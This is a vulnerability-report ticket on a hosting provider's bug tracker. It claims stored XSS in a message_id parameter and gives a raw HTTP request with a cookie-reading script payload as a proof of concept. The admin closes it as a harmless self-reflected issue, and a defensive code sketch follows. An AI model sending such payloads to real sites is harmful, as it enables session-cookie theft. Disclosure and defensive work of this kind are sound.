Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by waloodi_109 - 13.11.2024
Last edited by cbay - 13.11.2024

FS#99 - STORED XSS IN MESSAGE PARAMETER

Stored XSS in message parameter:

Hello Team, I hope you are doing well. While researching your domain, I found stored XSS in the message parameter via the POST method.

Steps:

1. Go to https://admin.alwaysdata.com/message/toggle/.
2. Capture this request on BurpSuite.
3. In the POST request there is a message_id parameter. You can input the XSS payload <script>alert(document.cookie)</script>, then copy the request and paste it in the browser; you will see it reflected in the browser.

PoC:

POST /message/toggle/ HTTP/2
Host: admin.alwaysdata.com
Cookie: csrftoken=xxxxxxxxxxxxxx; django_language=en; sessionid=xxxxxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://admin.alwaysdata.com/message/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrftoken: nxxtYwkQfIRMWcftaEokwghO10GoV6yv
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: https://admin.alwaysdata.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

message_id=<script>alert(document.cookie)</script>

Impact
Can steal cookies, can run JavaScript code, etc.

Thank You,

Waleed Anwar

Closed by  cbay
13.11.2024 10:50
Reason for closing:  Invalid
Admin
cbay commented on 13.11.2024 10:47

Hello,

First, if you have to use a proxy to modify a parameter, then it's not exploitable.

Second, even in that case, that's a self-reflected XSS, which is harmless.

Kind regards,
Cyril

Maybe any attacker hosts this and sends it to the user to steal cookies.
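
Added example, not part of the ticket and not alwaysdata's code: a minimal sketch of how a handler for a request shaped like the PoC can keep a reflected message_id from executing. The function name handle_toggle, the double-submit CSRF check, and the assumption that message_id is numeric are all hypothetical; the sample tokens are constructed.

```python
import hmac
import html
import json


def handle_toggle(cookies, headers, form):
    """Hypothetical handler; returns (status, content_type, body)."""
    # Assumed double-submit CSRF check: the X-Csrftoken header must equal the
    # csrftoken cookie. A page on another origin cannot read that cookie, so a
    # request it triggers in the victim's browser fails here.
    cookie_token = cookies.get("csrftoken", "")
    header_token = headers.get("X-Csrftoken", "")
    if not cookie_token or not hmac.compare_digest(
        cookie_token.encode(), header_token.encode()
    ):
        return 403, "application/json", json.dumps({"error": "CSRF check failed"})

    raw = form.get("message_id", "")
    # Assumption: message_id is a numeric key. Anything else is rejected
    # rather than processed.
    if not (raw.isascii() and raw.isdigit()):
        # Escape before reflecting, and answer as JSON so a browser does not
        # parse the body as HTML even when the response is opened directly.
        return 400, "application/json", json.dumps(
            {"error": "invalid message_id", "value": html.escape(raw)}
        )

    return 200, "application/json", json.dumps({"toggled": int(raw)})


# Constructed sample input modelled on the request in the report.
PAYLOAD = "<script>alert(document.cookie)</script>"
SAMPLE_COOKIES = {"csrftoken": "constructed-token"}
SAMPLE_HEADERS = {"X-Csrftoken": "constructed-token"}

if __name__ == "__main__":
    # Payload in message_id: rejected, reflected only in escaped form.
    print(handle_toggle(SAMPLE_COOKIES, SAMPLE_HEADERS, {"message_id": PAYLOAD}))
    # No matching CSRF header (what a cross-site form post would look like).
    print(handle_toggle(SAMPLE_COOKIES, {}, {"message_id": "42"}))
    # Well-formed request.
    print(handle_toggle(SAMPLE_COOKIES, SAMPLE_HEADERS, {"message_id": "42"}))
```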
